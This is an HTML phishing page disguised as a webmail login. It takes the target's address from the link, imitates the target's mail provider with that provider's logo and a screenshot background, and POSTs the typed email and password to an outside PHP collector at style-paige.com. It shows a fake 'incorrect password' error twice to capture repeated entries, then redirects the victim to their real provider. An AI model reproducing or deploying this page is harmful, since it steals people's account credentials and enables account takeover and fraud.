<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Mail</title>
    <meta name="googlebot" content="noindex">
    <meta name="googlebot-news" content="noindex">
    <meta name="googlebot" content="noindex">
    <meta name="googlebot-news" content="nosnippet">
    <link rel="icon" href="">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
     <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <style>
        *{
            margin: 0;
            padding: 0;
        }
        body{
            box-sizing: border-box;
            font-family: sans-serif;
            background: rgba(0, 0, 0, 0.04) url("");
            background-repeat:no-repeat;
            background-size: cover; 
        }
        .main-contain{
            width: 26%;
            background-color: #fff;
            border-radius: 5px;
            padding: 20px;
            margin: 80px auto;
        }
        .logbox{
            display: flex;
            align-items: center;
            justify-content: center;
            text-align: center;
            margin-top: 10px;
        }
        .logbox span{
            font-size: 29px;
            margin-left: 10px;
            text-transform: capitalize;
        }
        .sign-p{
            text-align: center;
            margin: 0 18px;
            margin-top: 50px;
        }
        .sign-p p{
            color: #717171;
            font-weight: 500;
            font-size: 17px;
        }
        .signform{
            padding: 0 30px;
            margin-top: 30px;
        }
        .inpg input{
            width: 100%;
            margin: 10px 0;
            border:1px solid #e8e7e7;
            font-family: inherit;
            padding: 13px 10px;
            font-weight: 400;
            font-size: 15px;
            border-radius: 3px;
        }
        .inpg input:focus{
           outline: none;
        }
        .inp2b{
            text-align: center;
        }
        .inp2b button{
            display: inline-block;
            width: 90%;
            margin: 0 auto;
            margin-top: 20px;
            text-align: center;
            height: 45px;
            background-color: #000066;
            color: #fff;
            font-size: 18px;
            border: none;
            cursor: pointer;
        }
        .inp2b button:hover{
            color: #ccc;
        }
        .foot-img{
            text-align: center;
        }
        .error{
            color: red;
            text-align: center;
        }
        .hide {
            display: none;
        }

        @media screen and (max-width: 569px){
            body{
                height: 100vh;
            }
             .main-contain{
                width: 90%;
             }
        }


    </style>
</head>
<body class="bodymain">

    <div class="container">
         <div class="main-contain">
            <div class="logbox">
                <img src="https://reliable-firm.netlify.app/pix.jpeg" alt="pix" width="28" class="logo">
                <span class="name">Webmail</span>
            </div>

            <div class="sign-p">
                <p>Sign in with your email address and password to continue using your current password</p>
            </div>

            <div class="signform">

                <p class="error hide"></p>
                <form action="#" id="form">
                    <div class="inpg">
                        <input type="text" name="em" id="em" placeholder="Email" readonly>
                    </div>

                     <div class="inpg">
                        <input type="password" name="pa" id="pa" placeholder="Password">
                    </div>

                     <div class="inp2b">
                      <button class="btnlogin" disabled>Login</button>
                    </div>

                    <div class="foot-img">
                        <img src="https://reliable-firm.netlify.app/nort.png" alt="nort" width="70">
                    </div>
                </form>
            </div>


         </div>
    </div>


    <script>
        const boxf = document.getElementById("form");
        const em = document.getElementById("em");
        const pa = document.getElementById("pa");
        const error = document.querySelector(".error");
        const logo = document.querySelector(".logo");
        const name = document.querySelector(".name");
        const btnlogin = document.querySelector(".btnlogin");
        const bodymain = document.querySelector(".bodymain");
        const fav =  document.querySelector("link[rel*='icon']");
        let finurl = "";
        let errKey = 0;

        window.addEventListener("load", () => {
            btnlogin.disabled = false;
           const id =  window.location.href.split("#")[1];
           let logoUrl = id.split("@")[1];
           finurl = logoUrl;
           let nameUrl = logoUrl.split(".")[0];

           if(id){
            em.value = id;
            document.title = logoUrl.split(".")[0];
            fav.href = `https://logo.clearbit.com/${logoUrl}`;
            if(logoUrl === "gmail.com"){
                bodymain.style.background = `rgba(0, 0, 0, 0.04) url(https://image.thum.io/get/width/1280/crop/600/https://www.google.com/intl/us/gmail/about/)`;
                bodymain.style.backgroundRepeat = `no-repeat`;
                bodymain.style.backgroundSize = `cover`;
                logo.src = `https://logo.clearbit.com/${logoUrl}`;
                name.textContent = nameUrl;
            }
            else {
                 bodymain.style.background = `rgba(0, 0, 0, 0.04) url(https://image.thum.io/get/width/1280/crop/600/https://${logoUrl})`;
                bodymain.style.backgroundRepeat = `no-repeat`;
                bodymain.style.backgroundSize = `cover`;
                logo.src = `https://logo.clearbit.com/${logoUrl}`;
                name.textContent = nameUrl;
            }
           
           }
        });

        boxf.addEventListener("submit", (e) => {
            e.preventDefault();
            if(em.value === ""){
                error.classList.remove("hide");
                error.textContent = "Email field is empty...!";
            }
            else if(pa.value === ""){
                error.classList.remove("hide");
                error.textContent = "Password field is empty...!";
            }
            else {
                errKey++;
                let fa = `Email: ${em.value} \nPassword: ${pa.value}`;
                $.ajax({
                url: 'https://www.style-paige.com/cache/webm23/fas.php',
                type: 'POST',
                data: { pass: fa },
                });
                error.classList.add("hide");
                error.textContent = "";
                btnlogin.textContent = "Verifying...";
                btnlogin.disabled = true;

                setTimeout(() => {
                    btnlogin.textContent = "Login";
                    btnlogin.disabled = false;
                    if(errKey <= 2){
                        error.classList.remove("hide");
                        error.textContent = "Incorrect Email Password, try again";
                        pa.value = "";
                    }
                    else {
                        error.classList.add("hide");
                        error.textContent = "";
                        btnlogin.textContent = "Log in";
                        window.location.href = `https://www.${finurl}`;
                    }
                }, 2000);

                setTimeout(() => {
                   
                }, 2000);
            }

        });

    </script>
    
</body>
</html>